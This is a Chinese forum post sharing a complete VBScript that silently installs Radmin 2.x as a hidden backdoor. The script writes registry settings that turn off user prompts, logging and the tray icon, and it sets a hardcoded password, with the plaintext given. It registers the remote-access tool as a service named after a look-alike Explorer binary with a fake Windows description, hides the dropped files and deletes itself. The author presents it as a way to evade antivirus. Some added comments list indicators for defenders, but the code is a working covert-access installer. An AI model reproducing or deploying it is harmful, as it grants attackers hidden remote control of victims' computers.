作者:孤狐浪子
来源:红狼
在网上看到N多人做radmin后门,要导出注册表,而且还会被杀毒软件查杀。所以本人把自己写的脚本提供给大家分享。比较实用,希望大家喜欢。
' Flat installer script for a Radmin 2.x server. Everything below runs top to bottom with no
' procedures: it writes the Radmin server configuration under HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters
' through the WMI StdRegProv provider, registers a Windows service named WinManageHelp whose binary is
' system32\Exporer.exe (note the missing "l" - a look-alike of Explorer.exe), starts that service, marks
' the dropped files read-only/hidden/system, and finally deletes the script file itself.
'
' Indicators a defender can take straight from this listing: the registry key SYSTEM\RAdmin\v2.0\Server\Parameters
' under HKLM; a service WinManageHelp with display name "Windows Management Instrumentation Player Drivers";
' the files Exporer.exe, AdmDll.dll and raddrv.dll in system32 carrying +r +h +s attributes; the port value
' 1029 written below; and a .vbs that removes itself via Scripting.FileSystemObject.
' Path separators appear as forward slashes throughout this transcription; registry paths and the
' %systemroot% file paths are otherwise as written by the author.

' Suppresses runtime errors, so a failing step (e.g. no admin rights) is silently skipped rather than aborting.
on error resume next
const HKEY_LOCAL_MACHINE = &H80000002
' "." = the local machine; the script never targets a remote host.
strComputer = "."
' Assigned but never used below.
Set StdOut = WScript.StdOut
' WMI registry provider (StdRegProv) on the local machine.
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &_
strComputer & "/root/default:StdRegProv")
' Create the Radmin 2.0 server key hierarchy under HKLM\SYSTEM, one level at a time.
strKeyPath = "SYSTEM/RAdmin"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/RAdmin/v2.0"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/RAdmin/v2.0/Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/RAdmin/v2.0/Server/iplist"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
' Second handle to the same provider, this time without the impersonation moniker.
Set objRegistry = GetObject("Winmgmts:root/default:StdRegProv")
strPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
' Each setting below is written as a 4-byte little-endian REG_BINARY value. Judging by the value
' names, this turns the user prompt, auto-allow, event log, log file, IP filter and NT authentication
' off and hides the tray icon - confirm the exact meaning of each flag against Radmin 2.x documentation.
' The return value of SetBinaryValue is stored in Return but never checked.
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AskUser",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"AutoAllow",uBinary)
uBinary = Array(1,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"DisableTrayIcon",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableEventLog",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"EnableLogFile",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"FilterIp",uBinary)
uBinary = Array(0,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"NTAuthEnabled",uBinary)
' 16-byte blob copied from a registry export of a configured Radmin server (hex converted to decimal).
uBinary = Array(198,195,162,215,37,223,10,224,99,83,126,32,212,173,208,119) //this is the registry export, hex converted to decimal; pass:241241241
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Parameter",uBinary) //Radmin password
' Array(5,4,0,0) is 0x0405 little-endian = 1029 decimal.
uBinary = Array(5,4,0,0) //port: 1029
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Port",uBinary)
' Array(10,0,0,0) = 10.
uBinary = Array(10,0,0,0)
Return = objRegistry.SetBinaryValue(HKEY_LOCAL_MACHINE,strPath,"Timeout",uBinary)
' Re-acquire the provider (same moniker as above) for the string values that follow.
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &strComputer &"/root/default:StdRegProv")
strKeyPath = "SYSTEM/RAdmin/v2.0/Server/Parameters"
' LogFilePath is written even though EnableLogFile was set to 0 above.
strValueName = "LogFilePath"
strValue = "c:/logfile.txt"
set wshshell=createobject ("wscript.shell")
' Service registration via sc.exe: name WinManageHelp, binary system32\Exporer.exe, auto start.
' The second argument (0) runs the command with a hidden window. This happens before the
' LogFilePath write on the next line - order kept as in the original.
a=wshshell.run ("sc.exe create WinManageHelp binpath= %systemroot%/system32/Exporer.exe start= auto",0)
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!//" &strComputer &"/root/default:StdRegProv")
' Dresses up the new service directly under ControlSet001 (not CurrentControlSet) with a
' Windows-sounding description and display name. The Description string is reproduced as the
' author wrote it, including the run-together product names.
strKeyPath = "SYSTEM/ControlSet001/Services/WinManageHelp"
strValueName = "Description"
strValue = "Windows Media PlayerWindows Management Instrumentation Player Drivers."
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
strValueName = "DisplayName"
strValue = "Windows Management Instrumentation Player Drivers"
oReg.SetStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
' ImagePath is stored as REG_EXPAND_SZ and passes "/service" to the renamed Radmin binary.
strValueName = "ImagePath"
strValue = "c:/windows/system32/Exporer.exe /service"
oReg.SetExpandedStringValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,strValue
set wshshell=createobject ("wscript.shell")
' Start the service, then hide the three dropped files with read-only + hidden + system attributes.
' These three file names are the on-disk indicators of this installer.
a=wshshell.run ("net start WinManageHelp",0)
b=wshshell.run ("attrib +r +h +s %systemroot%/system32/exporer.exe",0)
c=wshshell.run ("attrib +r +h +s %systemroot%/system32/AdmDll.dll",0)
d=wshshell.run ("attrib +r +h +s %systemroot%/system32/raddrv.dll",0)
' Anti-forensic step: the running script deletes its own file by name.
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName) //self-delete
附件:
RAdmin.rar (1014 Bytes)
Radmin VBS加密版.rar (1.4 KB)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。